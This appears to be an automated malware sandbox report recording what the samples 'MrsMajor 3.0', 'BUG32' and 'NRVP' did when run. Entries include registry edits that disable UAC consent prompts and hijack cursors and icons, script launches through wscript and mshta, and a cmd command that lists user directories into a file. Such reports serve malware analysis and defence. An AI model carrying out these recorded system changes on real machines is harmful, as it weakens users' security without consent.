| File opened (read-only) | \??\L: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Cursors\AppStarting = "C:\\bug32\\bx.cur" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Cursors\Hand = "C:\\bug32\\bx.cur" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Cursors | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Cursors\Arrow = "C:\\bug32\\bx.cur" | C:\Windows\System32\wscript.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133257055086847963" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{FFEDD439-3C59-4C39-B5A0-EC9968813E47} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings | C:\Users\Admin\Downloads\NRVP.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DDDB.tmp\eulascr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4A8F.tmp\eulascr.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\MrsMajor 3.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MrsMajor 3.0.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\System32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\.js
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe83da9758,0x7ffe83da9768,0x7ffe83da9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1804 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1444 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3204 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3328 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4440 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4632 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4620 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5060 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5212 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5268 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3200 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3896 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3400 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5460 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5664 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3440 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5152 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5092 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5996 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=3340 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6000 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5364 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6024 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5984 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6048 --field-trial-handle=1872,i,13080886905307636739,16230541509137878953,131072 /prefetch:8
C:\Users\Admin\Downloads\NRVP.exe
"C:\Users\Admin\Downloads\NRVP.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\NRVP590\.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6349:84:7zEvent8362
C:\Users\Admin\Downloads\MrsMajor 3.0.exe
"C:\Users\Admin\Downloads\MrsMajor 3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\DDDB.tmp\DDDC.tmp\DDDD.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\DDDB.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\DDDB.tmp\eulascr.exe"
C:\Users\Admin\Downloads\MrsMajor 3.0.exe
"C:\Users\Admin\Downloads\MrsMajor 3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\4A8F.tmp\4A90.tmp\4A91.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\4A8F.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\4A8F.tmp\eulascr.exe"
C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe83da9758,0x7ffe83da9768,0x7ffe83da9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4552 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4896 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5136 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3420 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3388 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1720 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3408 --field-trial-handle=1900,i,9361332766506345887,3249965216884118541,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap21188:72:7zEvent20262
C:\Users\Admin\Downloads\BUG32.exe
"C:\Users\Admin\Downloads\BUG32.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\5D23.tmp\5D24.vbs
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c dir "C:\Users\Admin\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
